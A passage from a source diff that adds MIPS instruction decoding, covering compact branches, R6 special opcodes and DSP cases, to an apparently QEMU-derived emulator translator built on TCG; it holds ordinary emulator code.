OPC_BGEZC, OPC_BGEC */ + case OPC_BGTZC: /* OPC_BLTZC, OPC_BLTC */ + gen_load_gpr(ctx, t0, rs); + gen_load_gpr(ctx, t1, rt); + bcond_compute = 1; + ctx->btarget = addr_add(ctx, ctx->pc + 4, offset); + break; + case OPC_BLEZALC: /* OPC_BGEZALC, OPC_BGEUC */ + case OPC_BGTZALC: /* OPC_BLTZALC, OPC_BLTUC */ + if (rs == 0 || rs == rt) { + /* OPC_BLEZALC, OPC_BGEZALC */ + /* OPC_BGTZALC, OPC_BLTZALC */ + tcg_gen_movi_tl(tcg_ctx, *cpu_gpr[31], ctx->pc + 4); + } + gen_load_gpr(ctx, t0, rs); + gen_load_gpr(ctx, t1, rt); + bcond_compute = 1; + ctx->btarget = addr_add(ctx, ctx->pc + 4, offset); + break; + case OPC_BC: + case OPC_BALC: + ctx->btarget = addr_add(ctx, ctx->pc + 4, offset); + break; + case OPC_BEQZC: + case OPC_BNEZC: + if (rs != 0) { + /* OPC_BEQZC, OPC_BNEZC */ + gen_load_gpr(ctx, t0, rs); + bcond_compute = 1; + ctx->btarget = addr_add(ctx, ctx->pc + 4, offset); + } else { + /* OPC_JIC, OPC_JIALC */ + TCGv tbase = tcg_temp_new(tcg_ctx); + TCGv toffset = tcg_temp_new(tcg_ctx); + + gen_load_gpr(ctx, tbase, rt); + tcg_gen_movi_tl(tcg_ctx, toffset, offset); + gen_op_addr_add(ctx, *(TCGv *)tcg_ctx->btarget, tbase, toffset); + tcg_temp_free(tcg_ctx, tbase); + tcg_temp_free(tcg_ctx, toffset); + } + break; + default: + MIPS_INVAL("Compact branch/jump"); + generate_exception(ctx, EXCP_RI); + goto out; + } + + if (bcond_compute == 0) { + /* Uncoditional compact branch */ + switch (opc) { + case OPC_JIALC: + tcg_gen_movi_tl(tcg_ctx, *cpu_gpr[31], ctx->pc + 4); + /* Fallthrough */ + case OPC_JIC: + ctx->hflags |= MIPS_HFLAG_BR; + break; + case OPC_BALC: + tcg_gen_movi_tl(tcg_ctx, *cpu_gpr[31], ctx->pc + 4); + /* Fallthrough */ + case OPC_BC: + ctx->hflags |= MIPS_HFLAG_B; + break; + default: + MIPS_INVAL("Compact branch/jump"); + generate_exception(ctx, EXCP_RI); + goto out; + } + + /* Generating branch here as compact branches don't have delay slot */ + gen_branch(ctx, 4); + } else { + /* Conditional compact branch */ + int fs = gen_new_label(tcg_ctx); + save_cpu_state(ctx, 0); + + switch (opc) { + case OPC_BLEZALC: /* OPC_BGEZALC, OPC_BGEUC */ + if (rs == 0 && rt != 0) { + /* OPC_BLEZALC */ + tcg_gen_brcondi_tl(tcg_ctx, tcg_invert_cond(TCG_COND_LE), t1, 0, fs); + } else if (rs != 0 && rt != 0 && rs == rt) { + /* OPC_BGEZALC */ + tcg_gen_brcondi_tl(tcg_ctx, tcg_invert_cond(TCG_COND_GE), t1, 0, fs); + } else { + /* OPC_BGEUC */ + tcg_gen_brcond_tl(tcg_ctx, tcg_invert_cond(TCG_COND_GEU), t0, t1, fs); + } + break; + case OPC_BGTZALC: /* OPC_BLTZALC, OPC_BLTUC */ + if (rs == 0 && rt != 0) { + /* OPC_BGTZALC */ + tcg_gen_brcondi_tl(tcg_ctx, tcg_invert_cond(TCG_COND_GT), t1, 0, fs); + } else if (rs != 0 && rt != 0 && rs == rt) { + /* OPC_BLTZALC */ + tcg_gen_brcondi_tl(tcg_ctx, tcg_invert_cond(TCG_COND_LT), t1, 0, fs); + } else { + /* OPC_BLTUC */ + tcg_gen_brcond_tl(tcg_ctx, tcg_invert_cond(TCG_COND_LTU), t0, t1, fs); + } + break; + case OPC_BLEZC: /* OPC_BGEZC, OPC_BGEC */ + if (rs == 0 && rt != 0) { + /* OPC_BLEZC */ + tcg_gen_brcondi_tl(tcg_ctx, tcg_invert_cond(TCG_COND_LE), t1, 0, fs); + } else if (rs != 0 && rt != 0 && rs == rt) { + /* OPC_BGEZC */ + tcg_gen_brcondi_tl(tcg_ctx, tcg_invert_cond(TCG_COND_GE), t1, 0, fs); + } else { + /* OPC_BGEC */ + tcg_gen_brcond_tl(tcg_ctx, tcg_invert_cond(TCG_COND_GE), t0, t1, fs); + } + break; + case OPC_BGTZC: /* OPC_BLTZC, OPC_BLTC */ + if (rs == 0 && rt != 0) { + /* OPC_BGTZC */ + tcg_gen_brcondi_tl(tcg_ctx, tcg_invert_cond(TCG_COND_GT), t1, 0, fs); + } else if (rs != 0 && rt != 0 && rs == rt) { + /* OPC_BLTZC */ + tcg_gen_brcondi_tl(tcg_ctx, tcg_invert_cond(TCG_COND_LT), t1, 0, fs); + } else { + /* OPC_BLTC */ + tcg_gen_brcond_tl(tcg_ctx, tcg_invert_cond(TCG_COND_LT), t0, t1, fs); + } + break; + case OPC_BOVC: /* OPC_BEQZALC, OPC_BEQC */ + case OPC_BNVC: /* OPC_BNEZALC, OPC_BNEC */ + if (rs >= rt) { + /* OPC_BOVC, OPC_BNVC */ + TCGv t2 = tcg_temp_new(tcg_ctx); + TCGv t3 = tcg_temp_new(tcg_ctx); + TCGv t4 = tcg_temp_new(tcg_ctx); + TCGv input_overflow = tcg_temp_new(tcg_ctx); + + gen_load_gpr(ctx, t0, rs); + gen_load_gpr(ctx, t1, rt); + tcg_gen_ext32s_tl(tcg_ctx, t2, t0); + tcg_gen_setcond_tl(tcg_ctx, TCG_COND_NE, input_overflow, t2, t0); + tcg_gen_ext32s_tl(tcg_ctx, t3, t1); + tcg_gen_setcond_tl(tcg_ctx, TCG_COND_NE, t4, t3, t1); + tcg_gen_or_tl(tcg_ctx, input_overflow, input_overflow, t4); + + tcg_gen_add_tl(tcg_ctx, t4, t2, t3); + tcg_gen_ext32s_tl(tcg_ctx, t4, t4); + tcg_gen_xor_tl(tcg_ctx, t2, t2, t3); + tcg_gen_xor_tl(tcg_ctx, t3, t4, t3); + tcg_gen_andc_tl(tcg_ctx, t2, t3, t2); + tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_LT, t4, t2, 0); + tcg_gen_or_tl(tcg_ctx, t4, t4, input_overflow); + if (opc == OPC_BOVC) { + /* OPC_BOVC */ + tcg_gen_brcondi_tl(tcg_ctx, tcg_invert_cond(TCG_COND_NE), t4, 0, fs); + } else { + /* OPC_BNVC */ + tcg_gen_brcondi_tl(tcg_ctx, tcg_invert_cond(TCG_COND_EQ), t4, 0, fs); + } + tcg_temp_free(tcg_ctx, input_overflow); + tcg_temp_free(tcg_ctx, t4); + tcg_temp_free(tcg_ctx, t3); + tcg_temp_free(tcg_ctx, t2); + } else if (rs < rt && rs == 0) { + /* OPC_BEQZALC, OPC_BNEZALC */ + if (opc == OPC_BEQZALC) { + /* OPC_BEQZALC */ + tcg_gen_brcondi_tl(tcg_ctx, tcg_invert_cond(TCG_COND_EQ), t1, 0, fs); + } else { + /* OPC_BNEZALC */ + tcg_gen_brcondi_tl(tcg_ctx, tcg_invert_cond(TCG_COND_NE), t1, 0, fs); + } + } else { + /* OPC_BEQC, OPC_BNEC */ + if (opc == OPC_BEQC) { + /* OPC_BEQC */ + tcg_gen_brcond_tl(tcg_ctx, tcg_invert_cond(TCG_COND_EQ), t0, t1, fs); + } else { + /* OPC_BNEC */ + tcg_gen_brcond_tl(tcg_ctx, tcg_invert_cond(TCG_COND_NE), t0, t1, fs); + } + } + break; + case OPC_BEQZC: + tcg_gen_brcondi_tl(tcg_ctx, tcg_invert_cond(TCG_COND_EQ), t0, 0, fs); + break; + case OPC_BNEZC: + tcg_gen_brcondi_tl(tcg_ctx, tcg_invert_cond(TCG_COND_NE), t0, 0, fs); + break; + default: + MIPS_INVAL("Compact conditional branch/jump"); + generate_exception(ctx, EXCP_RI); + goto out; + } + + /* Generating branch here as compact branches don't have delay slot */ + gen_goto_tb(ctx, 1, ctx->btarget); + gen_set_label(tcg_ctx, fs); + + ctx->hflags |= MIPS_HFLAG_FBNSLOT; + MIPS_DEBUG("Compact conditional branch"); + } + +out: + tcg_temp_free(tcg_ctx, t0); + tcg_temp_free(tcg_ctx, t1); +} + +static void decode_opc_special_r6(CPUMIPSState *env, DisasContext *ctx) +{ + TCGContext *tcg_ctx = env->uc->tcg_ctx; + TCGv **cpu_gpr = (TCGv **)tcg_ctx->cpu_gpr; + int rs, rt, rd, sa; + uint32_t op1, op2; + + rs = (ctx->opcode >> 21) & 0x1f; + rt = (ctx->opcode >> 16) & 0x1f; + rd = (ctx->opcode >> 11) & 0x1f; + sa = (ctx->opcode >> 6) & 0x1f; + + op1 = MASK_SPECIAL(ctx->opcode); + switch (op1) { + case OPC_LSA: + if (rd != 0) { + int imm2 = extract32(ctx->opcode, 6, 3); + TCGv t0 = tcg_temp_new(tcg_ctx); + TCGv t1 = tcg_temp_new(tcg_ctx); + gen_load_gpr(ctx, t0, rs); + gen_load_gpr(ctx, t1, rt); + tcg_gen_shli_tl(tcg_ctx, t0, t0, imm2 + 1); + tcg_gen_add_tl(tcg_ctx, t0, t0, t1); + tcg_gen_ext32s_tl(tcg_ctx, *cpu_gpr[rd], t0); + tcg_temp_free(tcg_ctx, t1); + tcg_temp_free(tcg_ctx, t0); + } + break; + case OPC_MULT: case OPC_MULTU: case OPC_DIV: case OPC_DIVU: + op2 = MASK_R6_MULDIV(ctx->opcode); + switch (op2) { + case R6_OPC_MUL: + case R6_OPC_MUH: + case R6_OPC_MULU: + case R6_OPC_MUHU: + case R6_OPC_DIV: + case R6_OPC_MOD: + case R6_OPC_DIVU: + case R6_OPC_MODU: + gen_r6_muldiv(ctx, op2, rd, rs, rt); + break; + default: + MIPS_INVAL("special_r6 muldiv"); + generate_exception(ctx, EXCP_RI); + break; + } + break; + case OPC_SELEQZ: + case OPC_SELNEZ: + gen_cond_move(ctx, op1, rd, rs, rt); + break; + case R6_OPC_CLO: + case R6_OPC_CLZ: + if (rt == 0 && sa == 1) { + /* Major opcode and function field is shared with preR6 MFHI/MTHI. + We need additionally to check other fields */ + gen_cl(ctx, op1, rd, rs); + } else { + generate_exception(ctx, EXCP_RI); + } + break; + case R6_OPC_SDBBP: + if (ctx->hflags & MIPS_HFLAG_SBRI) { + generate_exception(ctx, EXCP_RI); + } else { + generate_exception(ctx, EXCP_DBp); + } + break; +#if defined(TARGET_MIPS64) + case OPC_DLSA: + check_mips_64(ctx); + if (rd != 0) { + int imm2 = extract32(ctx->opcode, 6, 3); + TCGv t0 = tcg_temp_new(tcg_ctx); + TCGv t1 = tcg_temp_new(tcg_ctx); + gen_load_gpr(ctx, t0, rs); + gen_load_gpr(ctx, t1, rt); + tcg_gen_shli_tl(tcg_ctx, t0, t0, imm2 + 1); + tcg_gen_add_tl(tcg_ctx, *cpu_gpr[rd], t0, t1); + tcg_temp_free(tcg_ctx, t1); + tcg_temp_free(tcg_ctx, t0); + } + break; + case R6_OPC_DCLO: + case R6_OPC_DCLZ: + if (rt == 0 && sa == 1) { + /* Major opcode and function field is shared with preR6 MFHI/MTHI. + We need additionally to check other fields */ + check_mips_64(ctx); + gen_cl(ctx, op1, rd, rs); + } else { + generate_exception(ctx, EXCP_RI); + } + break; + case OPC_DMULT: case OPC_DMULTU: case OPC_DDIV: case OPC_DDIVU: + op2 = MASK_R6_MULDIV(ctx->opcode); + switch (op2) { + case R6_OPC_DMUL: + case R6_OPC_DMUH: + case R6_OPC_DMULU: + case R6_OPC_DMUHU: + case R6_OPC_DDIV: + case R6_OPC_DMOD: + case R6_OPC_DDIVU: + case R6_OPC_DMODU: + check_mips_64(ctx); + gen_r6_muldiv(ctx, op2, rd, rs, rt); + break; + default: + MIPS_INVAL("special_r6 muldiv"); + generate_exception(ctx, EXCP_RI); + break; + } + break; +#endif + default: /* Invalid */ + MIPS_INVAL("special_r6"); + generate_exception(ctx, EXCP_RI); + break; + } +} + +static void decode_opc_special_legacy(CPUMIPSState *env, DisasContext *ctx) +{ + int rs, rt, rd, sa; + uint32_t op1; + + rs = (ctx->opcode >> 21) & 0x1f; + rt = (ctx->opcode >> 16) & 0x1f; + rd = (ctx->opcode >> 11) & 0x1f; + sa = (ctx->opcode >> 6) & 0x1f; + + op1 = MASK_SPECIAL(ctx->opcode); + switch (op1) { + case OPC_MOVN: /* Conditional move */ + case OPC_MOVZ: + check_insn(ctx, ISA_MIPS4 | ISA_MIPS32 | + INSN_LOONGSON2E | INSN_LOONGSON2F); + gen_cond_move(ctx, op1, rd, rs, rt); + break; + case OPC_MFHI: /* Move from HI/LO */ + case OPC_MFLO: + gen_HILO(ctx, op1, rs & 3, rd); + break; + case OPC_MTHI: + case OPC_MTLO: /* Move to HI/LO */ + gen_HILO(ctx, op1, rd & 3, rs); + break; + case OPC_MOVCI: + check_insn(ctx, ISA_MIPS4 | ISA_MIPS32); + if (env->CP0_Config1 & (1 << CP0C1_FP)) { + check_cp1_enabled(ctx); + gen_movci(ctx, rd, rs, (ctx->opcode >> 18) & 0x7, + (ctx->opcode >> 16) & 1); + } else { + generate_exception_err(ctx, EXCP_CpU, 1); + } + break; + case OPC_MULT: + case OPC_MULTU: + if (sa) { + check_insn(ctx, INSN_VR54XX); + op1 = MASK_MUL_VR54XX(ctx->opcode); + gen_mul_vr54xx(ctx, op1, rd, rs, rt); + } else { + gen_muldiv(ctx, op1, rd & 3, rs, rt); + } + break; + case OPC_DIV: + case OPC_DIVU: + gen_muldiv(ctx, op1, 0, rs, rt); + break; +#if defined(TARGET_MIPS64) + case OPC_DMULT: case OPC_DMULTU: case OPC_DDIV: case OPC_DDIVU: + check_insn(ctx, ISA_MIPS3); + check_mips_64(ctx); + gen_muldiv(ctx, op1, 0, rs, rt); + break; +#endif + case OPC_JR: + gen_compute_branch(ctx, op1, 4, rs, rd, sa, 4); + break; + case OPC_SPIM: +#ifdef MIPS_STRICT_STANDARD + MIPS_INVAL("SPIM"); + generate_exception(ctx, EXCP_RI); +#else + /* Implemented as RI exception for now. */ + MIPS_INVAL("spim (unofficial)"); + generate_exception(ctx, EXCP_RI); +#endif + break; + default: /* Invalid */ + MIPS_INVAL("special_legacy"); + generate_exception(ctx, EXCP_RI); + break; + } +} + +static void decode_opc_special(CPUMIPSState *env, DisasContext *ctx) +{ + TCGContext *tcg_ctx = env->uc->tcg_ctx; + int rs, rt, rd, sa; + uint32_t op1; + + rs = (ctx->opcode >> 21) & 0x1f; + rt = (ctx->opcode >> 16) & 0x1f; + rd = (ctx->opcode >> 11) & 0x1f; + sa = (ctx->opcode >> 6) & 0x1f; + + op1 = MASK_SPECIAL(ctx->opcode); + switch (op1) { + case OPC_SLL: /* Shift with immediate */ + if (sa == 5 && rd == 0 && + rs == 0 && rt == 0) { /* PAUSE */ + if ((ctx->insn_flags & ISA_MIPS32R6) && + (ctx->hflags & MIPS_HFLAG_BMASK)) { + MIPS_DEBUG("CTI in delay / forbidden slot"); + generate_exception(ctx, EXCP_RI); + break; + } + } + /* Fallthrough */ + case OPC_SRA: + gen_shift_imm(ctx, op1, rd, rt, sa); + break; + case OPC_SRL: + switch ((ctx->opcode >> 21) & 0x1f) { + case 1: + /* rotr is decoded as srl on non-R2 CPUs */ + if (ctx->insn_flags & ISA_MIPS32R2) { + op1 = OPC_ROTR; + } + /* Fallthrough */ + case 0: + gen_shift_imm(ctx, op1, rd, rt, sa); + break; + default: + generate_exception(ctx, EXCP_RI); + break; + } + break; + case OPC_ADD: case OPC_ADDU: case OPC_SUB: case OPC_SUBU: + gen_arith(ctx, op1, rd, rs, rt); + break; + case OPC_SLLV: /* Shifts */ + case OPC_SRAV: + gen_shift(ctx, op1, rd, rs, rt); + break; + case OPC_SRLV: + switch ((ctx->opcode >> 6) & 0x1f) { + case 1: + /* rotrv is decoded as srlv on non-R2 CPUs */ + if (ctx->insn_flags & ISA_MIPS32R2) { + op1 = OPC_ROTRV; + } + /* Fallthrough */ + case 0: + gen_shift(ctx, op1, rd, rs, rt); + break; + default: + generate_exception(ctx, EXCP_RI); + break; + } + break; + case OPC_SLT: /* Set on less than */ + case OPC_SLTU: + gen_slt(ctx, op1, rd, rs, rt); + break; + case OPC_AND: /* Logic*/ + case OPC_OR: + case OPC_NOR: + case OPC_XOR: + gen_logic(ctx, op1, rd, rs, rt); + break; + case OPC_JALR: + gen_compute_branch(ctx, op1, 4, rs, rd, sa, 4); + break; + case OPC_TGE: case OPC_TGEU: case OPC_TLT: case OPC_TLTU: case OPC_TEQ: + case OPC_TNE: + gen_trap(ctx, op1, rs, rt, -1); + break; + case OPC_LSA: /* OPC_PMON */ + if ((ctx->insn_flags & ISA_MIPS32R6) || + (env->CP0_Config3 & (1 << CP0C3_MSAP))) { + decode_opc_special_r6(env, ctx); + } else { + /* Pmon entry point, also R4010 selsl */ +#ifdef MIPS_STRICT_STANDARD + MIPS_INVAL("PMON / selsl"); + generate_exception(ctx, EXCP_RI); +#else + gen_helper_0e0i(tcg_ctx, pmon, sa); +#endif + } + break; + case OPC_SYSCALL: + generate_exception(ctx, EXCP_SYSCALL); + ctx->bstate = BS_STOP; + break; + case OPC_BREAK: + generate_exception(ctx, EXCP_BREAK); + break; + case OPC_SYNC: + /* Treat as NOP. */ + break; + +#if defined(TARGET_MIPS64) + /* MIPS64 specific opcodes */ + case OPC_DSLL: + case OPC_DSRA: + case OPC_DSLL32: + case OPC_DSRA32: + check_insn(ctx, ISA_MIPS3); + check_mips_64(ctx); + gen_shift_imm(ctx, op1, rd, rt, sa); + break; + case OPC_DSRL: + switch ((ctx->opcode >> 21) & 0x1f) { + case 1: + /* drotr is decoded as dsrl on non-R2 CPUs */ + if (ctx->insn_flags & ISA_MIPS32R2) { + op1 = OPC_DROTR; + } + /* Fallthrough */ + case 0: + check_insn(ctx, ISA_MIPS3); + check_mips_64(ctx); + gen_shift_imm(ctx, op1, rd, rt, sa); + break; + default: + generate_exception(ctx, EXCP_RI); + break; + } + break; + case OPC_DSRL32: + switch ((ctx->opcode >> 21) & 0x1f) { + case 1: + /* drotr32 is decoded as dsrl32 on non-R2 CPUs */ + if (ctx->insn_flags & ISA_MIPS32R2) { + op1 = OPC_DROTR32; + } + /* Fallthrough */ + case 0: + check_insn(ctx, ISA_MIPS3); + check_mips_64(ctx); + gen_shift_imm(ctx, op1, rd, rt, sa); + break; + default: + generate_exception(ctx, EXCP_RI); + break; + } + break; + case OPC_DADD: case OPC_DADDU: case OPC_DSUB: case OPC_DSUBU: + check_insn(ctx, ISA_MIPS3); + check_mips_64(ctx); + gen_arith(ctx, op1, rd, rs, rt); + break; + case OPC_DSLLV: + case OPC_DSRAV: + check_insn(ctx, ISA_MIPS3); + check_mips_64(ctx); + gen_shift(ctx, op1, rd, rs, rt); + break; + case OPC_DSRLV: + switch ((ctx->opcode >> 6) & 0x1f) { + case 1: + /* drotrv is decoded as dsrlv on non-R2 CPUs */ + if (ctx->insn_flags & ISA_MIPS32R2) { + op1 = OPC_DROTRV; + } + /* Fallthrough */ + case 0: + check_insn(ctx, ISA_MIPS3); + check_mips_64(ctx); + gen_shift(ctx, op1, rd, rs, rt); + break; + default: + generate_exception(ctx, EXCP_RI); + break; + } + break; + case OPC_DLSA: + if ((ctx->insn_flags & ISA_MIPS32R6) || + (env->CP0_Config3 & (1 << CP0C3_MSAP))) { + decode_opc_special_r6(env, ctx); + } + break; +#endif + default: + if (ctx->insn_flags & ISA_MIPS32R6) { + decode_opc_special_r6(env, ctx); + } else { + decode_opc_special_legacy(env, ctx); + } + } +} + +static void decode_opc_special2_legacy(CPUMIPSState *env, DisasContext *ctx) +{ + int rs, rt, rd; + uint32_t op1; + + check_insn_opc_removed(ctx, ISA_MIPS32R6); + + rs = (ctx->opcode >> 21) & 0x1f; + rt = (ctx->opcode >> 16) & 0x1f; + rd = (ctx->opcode >> 11) & 0x1f; + + op1 = MASK_SPECIAL2(ctx->opcode); + switch (op1) { + case OPC_MADD: case OPC_MADDU: + case OPC_MSUB: case OPC_MSUBU: + check_insn(ctx, ISA_MIPS32); + gen_muldiv(ctx, op1, rd & 3, rs, rt); + break; + case OPC_MUL: + gen_arith(ctx, op1, rd, rs, rt); + break; + case OPC_DIV_G_2F: + case OPC_DIVU_G_2F: + case OPC_MULT_G_2F: + case OPC_MULTU_G_2F: + case OPC_MOD_G_2F: + case OPC_MODU_G_2F: + check_insn(ctx, INSN_LOONGSON2F); + gen_loongson_integer(ctx, op1, rd, rs, rt); + break; + case OPC_CLO: + case OPC_CLZ: + check_insn(ctx, ISA_MIPS32); + gen_cl(ctx, op1, rd, rs); + break; + case OPC_SDBBP: + /* XXX: not clear which exception should be raised + * when in debug mode... + */ + check_insn(ctx, ISA_MIPS32); + if (!(ctx->hflags & MIPS_HFLAG_DM)) { + generate_exception(ctx, EXCP_DBp); + } else { + generate_exception(ctx, EXCP_DBp); + } + /* Treat as NOP. */ + break; +#if defined(TARGET_MIPS64) + case OPC_DCLO: + case OPC_DCLZ: + check_insn(ctx, ISA_MIPS64); + check_mips_64(ctx); + gen_cl(ctx, op1, rd, rs); + break; + case OPC_DMULT_G_2F: + case OPC_DMULTU_G_2F: + case OPC_DDIV_G_2F: + case OPC_DDIVU_G_2F: + case OPC_DMOD_G_2F: + case OPC_DMODU_G_2F: + check_insn(ctx, INSN_LOONGSON2F); + gen_loongson_integer(ctx, op1, rd, rs, rt); + break; +#endif + default: /* Invalid */ + MIPS_INVAL("special2_legacy"); + generate_exception(ctx, EXCP_RI); + break; + } +} + +static void decode_opc_special3_r6(CPUMIPSState *env, DisasContext *ctx) +{ + TCGContext *tcg_ctx = env->uc->tcg_ctx; + TCGv **cpu_gpr = (TCGv **)tcg_ctx->cpu_gpr; + int rs, rt, rd, sa; + uint32_t op1, op2; + int16_t imm; + + rs = (ctx->opcode >> 21) & 0x1f; + rt = (ctx->opcode >> 16) & 0x1f; + rd = (ctx->opcode >> 11) & 0x1f; + sa = (ctx->opcode >> 6) & 0x1f; + imm = (int16_t)ctx->opcode >> 7; + + op1 = MASK_SPECIAL3(ctx->opcode); + switch (op1) { + case R6_OPC_PREF: + if (rt >= 24) { + /* hint codes 24-31 are reserved and signal RI */ + generate_exception(ctx, EXCP_RI); + } + /* Treat as NOP. */ + break; + case R6_OPC_CACHE: + /* Treat as NOP. */ + break; + case R6_OPC_SC: + gen_st_cond(ctx, op1, rt, rs, imm); + break; + case R6_OPC_LL: + gen_ld(ctx, op1, rt, rs, imm); + break; + case OPC_BSHFL: + { + TCGv t0; + if (rd == 0) { + /* Treat as NOP. */ + break; + } + t0 = tcg_temp_new(tcg_ctx); + gen_load_gpr(ctx, t0, rt); + + op2 = MASK_BSHFL(ctx->opcode); + switch (op2) { + case OPC_ALIGN: case OPC_ALIGN_END: + sa &= 3; + if (sa == 0) { + tcg_gen_mov_tl(tcg_ctx, *cpu_gpr[rd], t0); + } else { + TCGv t1 = tcg_temp_new(tcg_ctx); + TCGv_i64 t2 = tcg_temp_new_i64(tcg_ctx); + gen_load_gpr(ctx, t1, rs); + tcg_gen_concat_tl_i64(tcg_ctx, t2, t1, t0); + tcg_gen_shri_i64(tcg_ctx, t2, t2, 8 * (4 - sa)); +#if defined(TARGET_MIPS64) + tcg_gen_ext32s_i64(tcg_ctx, *cpu_gpr[rd], t2); +#else + tcg_gen_trunc_i64_i32(tcg_ctx, *cpu_gpr[rd], t2); +#endif + tcg_temp_free_i64(tcg_ctx, t2); + tcg_temp_free(tcg_ctx, t1); + } + break; + case OPC_BITSWAP: + gen_helper_bitswap(tcg_ctx, *cpu_gpr[rd], t0); + break; + } + tcg_temp_free(tcg_ctx, t0); + } + break; +#if defined(TARGET_MIPS64) + case R6_OPC_SCD: + gen_st_cond(ctx, op1, rt, rs, imm); + break; + case R6_OPC_LLD: + gen_ld(ctx, op1, rt, rs, imm); + break; + case OPC_DBSHFL: + check_mips_64(ctx); + { + TCGv t0; + if (rd == 0) { + /* Treat as NOP. */ + break; + } + t0 = tcg_temp_new(tcg_ctx); + gen_load_gpr(ctx, t0, rt); + + op2 = MASK_DBSHFL(ctx->opcode); + switch (op2) { + case OPC_DALIGN: case OPC_DALIGN_END: + sa &= 7; + if (sa == 0) { + tcg_gen_mov_tl(tcg_ctx, *cpu_gpr[rd], t0); + } else { + TCGv t1 = tcg_temp_new(tcg_ctx); + gen_load_gpr(ctx, t1, rs); + tcg_gen_shli_tl(tcg_ctx, t0, t0, 8 * sa); + tcg_gen_shri_tl(tcg_ctx, t1, t1, 8 * (8 - sa)); + tcg_gen_or_tl(tcg_ctx, *cpu_gpr[rd], t1, t0); + tcg_temp_free(tcg_ctx, t1); + } + break; + case OPC_DBITSWAP: + gen_helper_dbitswap(tcg_ctx, *cpu_gpr[rd], t0); + break; + } + tcg_temp_free(tcg_ctx, t0); + } + break; +#endif + default: /* Invalid */ + MIPS_INVAL("special3_r6"); + generate_exception(ctx, EXCP_RI); + break; + } +} + +static void decode_opc_special3_legacy(CPUMIPSState *env, DisasContext *ctx) +{ + TCGContext *tcg_ctx = env->uc->tcg_ctx; + TCGv **cpu_gpr = (TCGv **)tcg_ctx->cpu_gpr; + int rs, rt, rd; + uint32_t op1, op2; + + rs = (ctx->opcode >> 21) & 0x1f; + rt = (ctx->opcode >> 16) & 0x1f; + rd = (ctx->opcode >> 11) & 0x1f; + + op1 = MASK_SPECIAL3(ctx->opcode); + switch (op1) { + case OPC_DIV_G_2E: case OPC_DIVU_G_2E: + case OPC_MOD_G_2E: case OPC_MODU_G_2E: + case OPC_MULT_G_2E: case OPC_MULTU_G_2E: + /* OPC_MULT_G_2E, OPC_ADDUH_QB_DSP, OPC_MUL_PH_DSP have + * the same mask and op1. */ + if ((ctx->insn_flags & ASE_DSPR2) && (op1 == OPC_MULT_G_2E)) { + op2 = MASK_ADDUH_QB(ctx->opcode); + switch (op2) { + case OPC_ADDUH_QB: + case OPC_ADDUH_R_QB: + case OPC_ADDQH_PH: + case OPC_ADDQH_R_PH: + case OPC_ADDQH_W: + case OPC_ADDQH_R_W: + case OPC_SUBUH_QB: + case OPC_SUBUH_R_QB: + case OPC_SUBQH_PH: + case OPC_SUBQH_R_PH: + case OPC_SUBQH_W: + case OPC_SUBQH_R_W: + gen_mipsdsp_arith(ctx, op1, op2, rd, rs, rt); + break; + case OPC_MUL_PH: + case OPC_MUL_S_PH: + case OPC_MULQ_S_W: + case OPC_MULQ_RS_W: + gen_mipsdsp_multiply(ctx, op1, op2, rd, rs, rt, 1); + break; + default: + MIPS_INVAL("MASK ADDUH.QB"); + generate_exception(ctx, EXCP_RI); + break; + } + } else if (ctx->insn_flags & INSN_LOONGSON2E) { + gen_loongson_integer(ctx, op1, rd, rs, rt); + } else { + generate_exception(ctx, EXCP_RI); + } + break; + case OPC_LX_DSP: + op2 = MASK_LX(ctx->opcode); + switch (op2) { +#if defined(TARGET_MIPS64) + case OPC_LDX: +#endif + case OPC_LBUX: + case OPC_LHX: + case OPC_LWX: + gen_mipsdsp_ld(ctx, op2, rd, rs, rt); + break; + default: /* Invalid */ + MIPS_INVAL("MASK LX"); + generate_exception(ctx, EXCP_RI); + break; + } + break; + case OPC_ABSQ_S_PH_DSP: + op2 = MASK_ABSQ_S_PH(ctx->opcode); + switch (op2) { + case OPC_ABSQ_S_QB: + case OPC_ABSQ_S_PH: + case OPC_ABSQ_S_W: + case OPC_PRECEQ_W_PHL: + case OPC_PRECEQ_W_PHR: + case OPC_PRECEQU_PH_QBL: + case OPC_PRECEQU_PH_QBR: + case OPC_PRECEQU_PH_QBLA: + case OPC_PRECEQU_PH_QBRA: + case OPC_PRECEU_PH_QBL: + case OPC_PRECEU_PH_QBR: + case OPC_PRECEU_PH_QBLA: + case OPC_PRECEU_PH_QBRA: + gen_mipsdsp_arith(ctx, op1, op2, rd, rs, rt); + break; + case OPC_BITREV: + case OPC_REPL_QB: + case OPC_REPLV_QB: + case OPC_REPL_PH: + case OPC_REPLV_PH: + gen_mipsdsp_bitinsn(ctx, op1, op2, rd, rt); + break; + default: + MIPS_INVAL("MASK ABSQ_S.PH"); + generate_exception(ctx, EXCP_RI); + break; + } + break; + case OPC_ADDU_QB_DSP: + op2 = MASK_ADDU_QB(ctx->opcode); + switch (op2) { + case OPC_ADDQ_PH: + case OPC_ADDQ_S_PH: + case OPC_ADDQ_S_W: + case OPC_ADDU_QB: + case OPC_ADDU_S_QB: + case OPC_ADDU_PH: + case OPC_ADDU_S_PH: + case OPC_SUBQ_PH: + case OPC_SUBQ_S_PH: + case OPC_SUBQ_S_W: + case OPC_SUBU_QB: + case OPC_SUBU_S_QB: + case OPC_SUBU_PH: + case OPC_SUBU_S_PH: + case OPC_ADDSC: + case OPC_ADDWC: + case OPC_MODSUB: + case OPC_RADDU_W_QB: + gen_mipsdsp_arith(ctx, op1, op2, rd, rs, rt); + break; + case OPC_MULEU_S_PH_QBL: + case OPC_MULEU_S_PH_QBR: + case OPC_MULQ_RS_PH: + case OPC_MULEQ_S_W_PHL: + case OPC_MULEQ_S_W_PHR: + case OPC_MULQ_S_PH: + gen_mipsdsp_multiply(ctx, op1, op2, rd, rs, rt, 1); + break; + default: /* Invalid */ + MIPS_INVAL("MASK ADDU.QB"); + generate_exception(ctx, EXCP_RI); + break; + + } + break; + case OPC_CMPU_EQ_QB_DSP: + op2 = MASK_CMPU_EQ_QB(ctx->opcode); + switch (op2) { + case OPC_PRECR_SRA_PH_W: + case OPC_PRECR_SRA_R_PH_W: + gen_mipsdsp_arith(ctx, op1, op2, rt, rs, rd); + break; + case OPC_PRECR_QB_PH: + case OPC_PRECRQ_QB_PH: + case OPC_PRECRQ_PH_W: + case OPC_PRECRQ_RS_PH_W: + case OPC_PRECRQU_S_QB_PH: + gen_mipsdsp_arith(ctx, op1, op2, rd, rs, rt); + break; + case OPC_CMPU_EQ_QB: + case OPC_CMPU_LT_QB: + case OPC_CMPU_LE_QB: + case OPC_CMP_EQ_PH: + case 